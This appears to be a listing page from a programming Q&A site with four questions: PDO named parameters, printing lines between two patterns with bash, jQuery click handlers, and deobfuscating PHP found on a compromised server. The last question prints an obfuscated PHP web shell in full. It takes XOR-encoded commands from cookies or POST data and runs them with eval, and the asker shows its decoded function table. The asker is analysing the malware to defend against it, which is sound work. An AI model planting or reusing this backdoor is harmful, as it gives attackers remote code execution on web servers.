Home / Questions

All Questions

Martin Hope
A. Cedano
Asked: 2020-07-25 05:48:55 +0800 CST
  • 14

As we know when using PDO there are two ways to prepare our queries: using placeholders ? or using name markers :nombre.

In the SQL statement, when name markers are used, each name is preceded by a colon ( :). For example:

SELECT * FROM usuario WHERE usuario_id=:id

Then, to pass a value relative to :id, the Manual shows examples similar to this :

$stmt->bindValue(":id",$id);

O well:

$stmt->bindParam(":id",$id);

or directly as an array in the execute :) :

$stmt->execute([":id"=>$id]);

But it turns out that if we don't put the colon when passing the parameters, the code works exactly the same.

That is, if I pass the parameters like this:

$stmt->bindValue("id",$id);

or this way:

$stmt->bindParam("id",$id);

or this way:

$stmt->execute(["id"=>$id]);

the code works exactly the same and returns the expected results.

Here is the proof:Ver código

Why does PDO work without the colon when passing parameters to it?

I am surprised that the Manual does not mention anything about it. I've even read somewhere that it's better to pass parameters in without using the colon.

php
Martin Hope
fedorqui
Asked: 2020-03-15 07:16:09 +0800 CST
  • 14

Question and answer based on my own question and answer in How to select lines between two patterns?

I have a file like the following and I would like to print the lines that appear between the patterns PAT1and PAT2.

1
2
PAT1
3    - primer bloque
4
PAT2
5
6
PAT1
7    - segundo bloque
PAT2
8
9
PAT1
10    - tercer bloque

I've read How to select lines between two marker patterns which may occur multiple times with awk/sed but I'm curious to see all the possible combinations, both printing the patterns and not.

How can I select the lines between two patterns?

bash
Martin Hope
Pavlo B.
Asked: 2020-01-21 08:22:29 +0800 CST
  • 14

If I have, for example, several <span>and I click on one, how can I, with jquery, know which one I clicked on? Being the IDs of the elements automatically numbered with item_<?php echo $i; ?>?

That is to say, I want that when doing in the span with id=item_2it makes me, for example, a alert.()"you have clicked on item_2"

<div id="items_en_uso">
  <span style="background:#c9c9c9;padding:3px;" id="item_1">Hola</span><br><br>
  <span style="background:#c9c9c9;padding:3px;" id="item_2">adios</span><br><br>
  <span style="background:#c9c9c9;padding:3px;" id="item_3">buenas</span><br><br>
  <span style="background:#c9c9c9;padding:3px;" id="item_4">malas</span><br><br>
</div>

EDIT:

Spans are added when clicking on another element with

$("#clikeable").click(function(){
   $("#items_en_uso").append("<span id='item"+count+"'>Hola</span>");
});

If the spans are set by hand (not by jquery) it works, but if I add them with jquery when clicking on them, it doesn't work for me... How can I fix this?

jquery
Martin Hope
Juan Pinzón
Asked: 2020-11-15 06:45:41 +0800 CST
  • 14

I was analyzing some compromised PHP files and came across some obfuscated scripts, here is one of these:

<?php
$i9c4 = 487;
$GLOBALS['a1c573'] = Array();
global $a1c573;
$a1c573 = $GLOBALS;
$ {
    "\x47\x4c\x4fB\x41\x4c\x53"
}

['p0279'] = "\x74\x4b\x2a\x4a\x26\x21\xa\x64\x6b\x61\x2e\xd\x3f\x3d\x73\x3c\x65\x2b\x9\x2d\x6a\x55\x24\x6f\x44\x5f\x79\x5a\x7d\x33\x46\x32\x50\x54\x63\x2c\x7c\x77\x75\x7a\x30\x27\x62\x52\x22\x4d\x39\x58\x41\x6c\x5c\x53\x76\x68\x20\x60\x57\x59\x6d\x5b\x66\x43\x23\x40\x7b\x3b\x4c\x2f\x49\x78\x29\x45\x5e\x28\x3a\x56\x70\x67\x69\x34\x38\x42\x31\x6e\x72\x25\x5d\x47\x7e\x51\x36\x4f\x35\x48\x3e\x4e\x37\x71";
$a1c573[$a1c573['p0279'][84] . $a1c573['p0279'][42] . $a1c573['p0279'][16] . $a1c573['p0279'][96] . $a1c573['p0279'][92]] = $a1c573['p0279'][34] . $a1c573['p0279'][53] . $a1c573['p0279'][84];
$a1c573[$a1c573['p0279'][77] . $a1c573['p0279'][90] . $a1c573['p0279'][96] . $a1c573['p0279'][31] . $a1c573['p0279'][92]] = $a1c573['p0279'][23] . $a1c573['p0279'][84] . $a1c573['p0279'][7];
$a1c573[$a1c573['p0279'][9] . $a1c573['p0279'][31] . $a1c573['p0279'][79] . $a1c573['p0279'][82] . $a1c573['p0279'][92] . $a1c573['p0279'][29] . $a1c573['p0279'][7] . $a1c573['p0279'][80] . $a1c573['p0279'][82]] = $a1c573['p0279'][14] . $a1c573['p0279'][0] . $a1c573['p0279'][84] . $a1c573['p0279'][49] . $a1c573['p0279'][16] . $a1c573['p0279'][83];
$a1c573[$a1c573['p0279'][38] . $a1c573['p0279'][82] . $a1c573['p0279'][60] . $a1c573['p0279'][7] . $a1c573['p0279'][34]] = $a1c573['p0279'][78] . $a1c573['p0279'][83] . $a1c573['p0279'][78] . $a1c573['p0279'][25] . $a1c573['p0279'][14] . $a1c573['p0279'][16] . $a1c573['p0279'][0];
$a1c573[$a1c573['p0279'][42] . $a1c573['p0279'][79] . $a1c573['p0279'][96] . $a1c573['p0279'][31] . $a1c573['p0279'][46] . $a1c573['p0279'][7] . $a1c573['p0279'][34] . $a1c573['p0279'][42]] = $a1c573['p0279'][14] . $a1c573['p0279'][16] . $a1c573['p0279'][84] . $a1c573['p0279'][78] . $a1c573['p0279'][9] . $a1c573['p0279'][49] . $a1c573['p0279'][78] . $a1c573['p0279'][39] . $a1c573['p0279'][16];
$a1c573[$a1c573['p0279'][38] . $a1c573['p0279'][96] . $a1c573['p0279'][29] . $a1c573['p0279'][29] . $a1c573['p0279'][80] . $a1c573['p0279'][34] . $a1c573['p0279'][92] . $a1c573['p0279'][42] . $a1c573['p0279'][16]] = $a1c573['p0279'][76] . $a1c573['p0279'][53] . $a1c573['p0279'][76] . $a1c573['p0279'][52] . $a1c573['p0279'][16] . $a1c573['p0279'][84] . $a1c573['p0279'][14] . $a1c573['p0279'][78] . $a1c573['p0279'][23] . $a1c573['p0279'][83];
$a1c573[$a1c573['p0279'][58] . $a1c573['p0279'][9] . $a1c573['p0279'][96] . $a1c573['p0279'][34]] = $a1c573['p0279'][38] . $a1c573['p0279'][83] . $a1c573['p0279'][14] . $a1c573['p0279'][16] . $a1c573['p0279'][84] . $a1c573['p0279'][78] . $a1c573['p0279'][9] . $a1c573['p0279'][49] . $a1c573['p0279'][78] . $a1c573['p0279'][39] . $a1c573['p0279'][16];
$a1c573[$a1c573['p0279'][0] . $a1c573['p0279'][9] . $a1c573['p0279'][92] . $a1c573['p0279'][9] . $a1c573['p0279'][34]] = $a1c573['p0279'][42] . $a1c573['p0279'][9] . $a1c573['p0279'][14] . $a1c573['p0279'][16] . $a1c573['p0279'][90] . $a1c573['p0279'][79] . $a1c573['p0279'][25] . $a1c573['p0279'][7] . $a1c573['p0279'][16] . $a1c573['p0279'][34] . $a1c573['p0279'][23] . $a1c573['p0279'][7] . $a1c573['p0279'][16];
$a1c573[$a1c573['p0279'][60] . $a1c573['p0279'][90] . $a1c573['p0279'][96] . $a1c573['p0279'][29] . $a1c573['p0279'][16] . $a1c573['p0279'][34] . $a1c573['p0279'][16] . $a1c573['p0279'][40] . $a1c573['p0279'][90]] = $a1c573['p0279'][14] . $a1c573['p0279'][16] . $a1c573['p0279'][0] . $a1c573['p0279'][25] . $a1c573['p0279'][0] . $a1c573['p0279'][78] . $a1c573['p0279'][58] . $a1c573['p0279'][16] . $a1c573['p0279'][25] . $a1c573['p0279'][49] . $a1c573['p0279'][78] . $a1c573['p0279'][58] . $a1c573['p0279'][78] . $a1c573['p0279'][0];
$a1c573[$a1c573['p0279'][76] . $a1c573['p0279'][90] . $a1c573['p0279'][7] . $a1c573['p0279'][31] . $a1c573['p0279'][34] . $a1c573['p0279'][29] . $a1c573['p0279'][34] . $a1c573['p0279'][79]] = $a1c573['p0279'][8] . $a1c573['p0279'][9] . $a1c573['p0279'][46] . $a1c573['p0279'][16] . $a1c573['p0279'][46] . $a1c573['p0279'][96] . $a1c573['p0279'][16] . $a1c573['p0279'][96] . $a1c573['p0279'][92];
$a1c573[$a1c573['p0279'][8] . $a1c573['p0279'][60] . $a1c573['p0279'][46] . $a1c573['p0279'][16] . $a1c573['p0279'][79] . $a1c573['p0279'][42]] = $a1c573['p0279'][77] . $a1c573['p0279'][82] . $a1c573['p0279'][82] . $a1c573['p0279'][96] . $a1c573['p0279'][29];
$a1c573[$a1c573['p0279'][60] . $a1c573['p0279'][92] . $a1c573['p0279'][34] . $a1c573['p0279'][42]] = $_POST;
$a1c573[$a1c573['p0279'][53] . $a1c573['p0279'][9] . $a1c573['p0279'][96] . $a1c573['p0279'][92] . $a1c573['p0279'][40] . $a1c573['p0279'][16] . $a1c573['p0279'][46] . $a1c573['p0279'][46] . $a1c573['p0279'][46]] = $_COOKIE;
@$a1c573[$a1c573['p0279'][38] . $a1c573['p0279'][82] . $a1c573['p0279'][60] . $a1c573['p0279'][7] . $a1c573['p0279'][34]]($a1c573['p0279'][16] . $a1c573['p0279'][84] . $a1c573['p0279'][84] . $a1c573['p0279'][23] . $a1c573['p0279'][84] . $a1c573['p0279'][25] . $a1c573['p0279'][49] . $a1c573['p0279'][23] . $a1c573['p0279'][77], NULL);
@$a1c573[$a1c573['p0279'][38] . $a1c573['p0279'][82] . $a1c573['p0279'][60] . $a1c573['p0279'][7] . $a1c573['p0279'][34]]($a1c573['p0279'][49] . $a1c573['p0279'][23] . $a1c573['p0279'][77] . $a1c573['p0279'][25] . $a1c573['p0279'][16] . $a1c573['p0279'][84] . $a1c573['p0279'][84] . $a1c573['p0279'][23] . $a1c573['p0279'][84] . $a1c573['p0279'][14], 0);
@$a1c573[$a1c573['p0279'][38] . $a1c573['p0279'][82] . $a1c573['p0279'][60] . $a1c573['p0279'][7] . $a1c573['p0279'][34]]($a1c573['p0279'][58] . $a1c573['p0279'][9] . $a1c573['p0279'][69] . $a1c573['p0279'][25] . $a1c573['p0279'][16] . $a1c573['p0279'][69] . $a1c573['p0279'][16] . $a1c573['p0279'][34] . $a1c573['p0279'][38] . $a1c573['p0279'][0] . $a1c573['p0279'][78] . $a1c573['p0279'][23] . $a1c573['p0279'][83] . $a1c573['p0279'][25] . $a1c573['p0279'][0] . $a1c573['p0279'][78] . $a1c573['p0279'][58] . $a1c573['p0279'][16], 0);
@$a1c573[$a1c573['p0279'][60] . $a1c573['p0279'][90] . $a1c573['p0279'][96] . $a1c573['p0279'][29] . $a1c573['p0279'][16] . $a1c573['p0279'][34] . $a1c573['p0279'][16] . $a1c573['p0279'][40] . $a1c573['p0279'][90]](0);
$n68b9ce = NULL;
$r8fa539 = NULL;
$a1c573[$a1c573['p0279'][0] . $a1c573['p0279'][31] . $a1c573['p0279'][96] . $a1c573['p0279'][40] . $a1c573['p0279'][29] . $a1c573['p0279'][9] . $a1c573['p0279'][60] . $a1c573['p0279'][46] . $a1c573['p0279'][9]] = $a1c573['p0279'][16] . $a1c573['p0279'][82] . $a1c573['p0279'][16] . $a1c573['p0279'][29] . $a1c573['p0279'][29] . $a1c573['p0279'][92] . $a1c573['p0279'][9] . $a1c573['p0279'][92] . $a1c573['p0279'][19] . $a1c573['p0279'][82] . $a1c573['p0279'][34] . $a1c573['p0279'][90] . $a1c573['p0279'][60] . $a1c573['p0279'][19] . $a1c573['p0279'][79] . $a1c573['p0279'][92] . $a1c573['p0279'][46] . $a1c573['p0279'][29] . $a1c573['p0279'][19] . $a1c573['p0279'][9] . $a1c573['p0279'][40] . $a1c573['p0279'][40] . $a1c573['p0279'][16] . $a1c573['p0279'][19] . $a1c573['p0279'][46] . $a1c573['p0279'][40] . $a1c573['p0279'][29] . $a1c573['p0279'][82] . $a1c573['p0279'][80] . $a1c573['p0279'][7] . $a1c573['p0279'][40] . $a1c573['p0279'][34] . $a1c573['p0279'][90] . $a1c573['p0279'][92] . $a1c573['p0279'][92] . $a1c573['p0279'][90];
global $t2703af9a;

function g1173($n68b9ce, $me55b842b)
{
    global $a1c573;
    $e538b = "";
    for ($sa5c67645 = 0; $sa5c67645 < $a1c573[$a1c573['p0279'][9] . $a1c573['p0279'][31] . $a1c573['p0279'][79] . $a1c573['p0279'][82] . $a1c573['p0279'][92] . $a1c573['p0279'][29] . $a1c573['p0279'][7] . $a1c573['p0279'][80] . $a1c573['p0279'][82]]($n68b9ce);) {
        for ($xf042d3f = 0; $xf042d3f < $a1c573[$a1c573['p0279'][9] . $a1c573['p0279'][31] . $a1c573['p0279'][79] . $a1c573['p0279'][82] . $a1c573['p0279'][92] . $a1c573['p0279'][29] . $a1c573['p0279'][7] . $a1c573['p0279'][80] . $a1c573['p0279'][82]]($me55b842b) && $sa5c67645 < $a1c573[$a1c573['p0279'][9] . $a1c573['p0279'][31] . $a1c573['p0279'][79] . $a1c573['p0279'][82] . $a1c573['p0279'][92] . $a1c573['p0279'][29] . $a1c573['p0279'][7] . $a1c573['p0279'][80] . $a1c573['p0279'][82]]($n68b9ce); $xf042d3f++, $sa5c67645++) {
            $e538b.= $a1c573[$a1c573['p0279'][84] . $a1c573['p0279'][42] . $a1c573['p0279'][16] . $a1c573['p0279'][96] . $a1c573['p0279'][92]]($a1c573[$a1c573['p0279'][77] . $a1c573['p0279'][90] . $a1c573['p0279'][96] . $a1c573['p0279'][31] . $a1c573['p0279'][92]]($n68b9ce[$sa5c67645]) ^ $a1c573[$a1c573['p0279'][77] . $a1c573['p0279'][90] . $a1c573['p0279'][96] . $a1c573['p0279'][31] . $a1c573['p0279'][92]]($me55b842b[$xf042d3f]));
        }
    }

    return $e538b;
}

function ka9e97e75($n68b9ce, $me55b842b)
{
    global $a1c573;
    global $t2703af9a;
    return $a1c573[$a1c573['p0279'][8] . $a1c573['p0279'][60] . $a1c573['p0279'][46] . $a1c573['p0279'][16] . $a1c573['p0279'][79] . $a1c573['p0279'][42]]($a1c573[$a1c573['p0279'][8] . $a1c573['p0279'][60] . $a1c573['p0279'][46] . $a1c573['p0279'][16] . $a1c573['p0279'][79] . $a1c573['p0279'][42]]($n68b9ce, $t2703af9a) , $me55b842b);
}

foreach($a1c573[$a1c573['p0279'][53] . $a1c573['p0279'][9] . $a1c573['p0279'][96] . $a1c573['p0279'][92] . $a1c573['p0279'][40] . $a1c573['p0279'][16] . $a1c573['p0279'][46] . $a1c573['p0279'][46] . $a1c573['p0279'][46]] as $me55b842b => $s51f5) {
    $n68b9ce = $s51f5;
    $r8fa539 = $me55b842b;
}

if (!$n68b9ce) {
    foreach($a1c573[$a1c573['p0279'][60] . $a1c573['p0279'][92] . $a1c573['p0279'][34] . $a1c573['p0279'][42]] as $me55b842b => $s51f5) {
        $n68b9ce = $s51f5;
        $r8fa539 = $me55b842b;
    }
}

$n68b9ce = @$a1c573[$a1c573['p0279'][58] . $a1c573['p0279'][9] . $a1c573['p0279'][96] . $a1c573['p0279'][34]]($a1c573[$a1c573['p0279'][76] . $a1c573['p0279'][90] . $a1c573['p0279'][7] . $a1c573['p0279'][31] . $a1c573['p0279'][34] . $a1c573['p0279'][29] . $a1c573['p0279'][34] . $a1c573['p0279'][79]]($a1c573[$a1c573['p0279'][0] . $a1c573['p0279'][9] . $a1c573['p0279'][92] . $a1c573['p0279'][9] . $a1c573['p0279'][34]]($n68b9ce) , $r8fa539));

if (isset($n68b9ce[$a1c573['p0279'][9] . $a1c573['p0279'][8]]) && $t2703af9a == $n68b9ce[$a1c573['p0279'][9] . $a1c573['p0279'][8]]) {
    if ($n68b9ce[$a1c573['p0279'][9]] == $a1c573['p0279'][78]) {
        $sa5c67645 = Array(
            $a1c573['p0279'][76] . $a1c573['p0279'][52] => @$a1c573[$a1c573['p0279'][38] . $a1c573['p0279'][96] . $a1c573['p0279'][29] . $a1c573['p0279'][29] . $a1c573['p0279'][80] . $a1c573['p0279'][34] . $a1c573['p0279'][92] . $a1c573['p0279'][42] . $a1c573['p0279'][16]]() ,
            $a1c573['p0279'][14] . $a1c573['p0279'][52] => $a1c573['p0279'][82] . $a1c573['p0279'][10] . $a1c573['p0279'][40] . $a1c573['p0279'][19] . $a1c573['p0279'][82],
        );
        echo @$a1c573[$a1c573['p0279'][42] . $a1c573['p0279'][79] . $a1c573['p0279'][96] . $a1c573['p0279'][31] . $a1c573['p0279'][46] . $a1c573['p0279'][7] . $a1c573['p0279'][34] . $a1c573['p0279'][42]]($sa5c67645);
    }
    elseif ($n68b9ce[$a1c573['p0279'][9]] == $a1c573['p0279'][16]) {
        eval /*qc7b4*/
        ($n68b9ce[$a1c573['p0279'][7]]);
    }

    exit();
} 
?>

To understand these scripts a little better I made one print_rof the variable $GLOBALSobtaining the following:

Array
(
    [_GET] => Array
        (
        )

    [_POST] => Array
        (
        )

    [_COOKIE] => Array
        (
        )

    [_FILES] => Array
        (
        )

    [GLOBALS] => Array
 *RECURSION*
    [i9c4] => 487
    [a1c573] => Array
 *RECURSION*
    [p0279] => tK*J&!
dka.
?=s<e+  -jU$oD_yZ}3F2PTc,|wuz0'bR"M9XAl\Svh `WYm[fC#@{;L/Ix)E^(:Vpgi48B1nr%]G~Q6O5H>N7q
    [rbe75] => chr
    [g6725] => ord
    [a24153d81] => strlen
    [u1fdc] => ini_set
    [b4729dcb] => serialize
    [u7338c5be] => phpversion
    [ma7c] => unserialize
    [ta5ac] => base64_decode
    [f673ece06] => set_time_limit
    [p6d2c3c4] => ka9e97e75
    [kf9e4b] => g1173
    [f5cb] => Array
        (
        )

    [ha750e999] => Array
        (
        )

    [n68b9ce] => 
    [r8fa539] => 
    [t2703af9a] => e1e335a5-1c6f-4593-a00e-90318d0c6556
)

Based on this my question is:

Is there a way to deobfuscate this code to make it more understandable? Or can something be done to know how it works?

php
Prev
Next